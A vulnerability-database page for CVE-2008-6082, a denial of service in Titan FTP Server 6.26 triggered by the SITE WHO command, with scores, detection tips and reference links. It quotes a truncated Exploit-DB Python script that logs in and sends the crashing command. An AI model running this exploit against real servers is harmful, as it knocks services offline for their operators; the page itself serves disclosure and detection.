CVE-2008-6082
published 2009-02-06CVE-2008-6082: Titan FTP Server 6.26 build 630 allows remote attackers to cause a denial of service (CPU consumption) via the SITE WHO command.
PriorityP431medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
44.58%
98.6th percentile
Titan FTP Server 6.26 build 630 allows remote attackers to cause a denial of service (CPU consumption) via the SITE WHO command.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| southrivertech | titan_ftp_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect FTP sessions issuing the 'SITE WHO' command, particularly from anonymous or low-privilege accounts, as this is the sole trigger for the DoS condition. ↗
- →Anonymous FTP access is sufficient to exploit this vulnerability; monitor for anonymous logins followed by SITE WHO commands. ↗
- →Monitor for sustained CPU consumption on Windows hosts running Titan FTP Server 6.26 build 630 following receipt of a SITE WHO FTP command. ↗
- →A valid FTP login (including anonymous) is required before the malicious SITE WHO command can be sent; correlate authentication events with subsequent SITE WHO issuance. ↗
- ·The exploit requires at minimum an anonymous FTP login, meaning no special credentials are needed to trigger the DoS; disabling anonymous FTP access would raise the bar for exploitation. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Titan FTP Server 6.26 build 630 - Remote Denial of Service
exploitdb·2008-10-14
CVE-2008-6082 Titan FTP Server 6.26 build 630 - Remote Denial of Service
Titan FTP Server 6.26 build 630 - Remote Denial of Service
---
# Titan FTP server v6.26 build 630 remote DoS exploit
# Titan FTP URL - http://www.titanftp.com/
# DoS'ed on "SITE WHO" command
# (x)dmnt
# -*- coding: windows-1252 -*-
import socket
import sys
def help_info():
print ("Usage: titand0s \n")
print ("Note: anonymous is enought\n")
def dos_it(hostname, username, passwd):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] " + r
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] Send evil string"
sock.send("SITE WHO\r\n")
sock.close()
print "[0] Now server d0s'ed"
print ("\n]Titan FTP server v6.2
Metasploit
Titan FTP Server 6.26.630 SITE WHO DoS
metasploit
Titan FTP Server 6.26.630 SITE WHO DoS
Titan FTP Server 6.26.630 SITE WHO DoS
The Titan FTP server v6.26 build 630 can be DoS'd by issuing "SITE WHO". You need a valid login so you can send this command.
No writeups or analysis indexed.
http://secunia.com/advisories/32269http://www.osvdb.org/49177http://www.securityfocus.com/bid/31757https://exchange.xforce.ibmcloud.com/vulnerabilities/45871https://www.exploit-db.com/exploits/6753http://secunia.com/advisories/32269http://www.osvdb.org/49177http://www.securityfocus.com/bid/31757https://exchange.xforce.ibmcloud.com/vulnerabilities/45871https://www.exploit-db.com/exploits/6753
2009-02-06
Published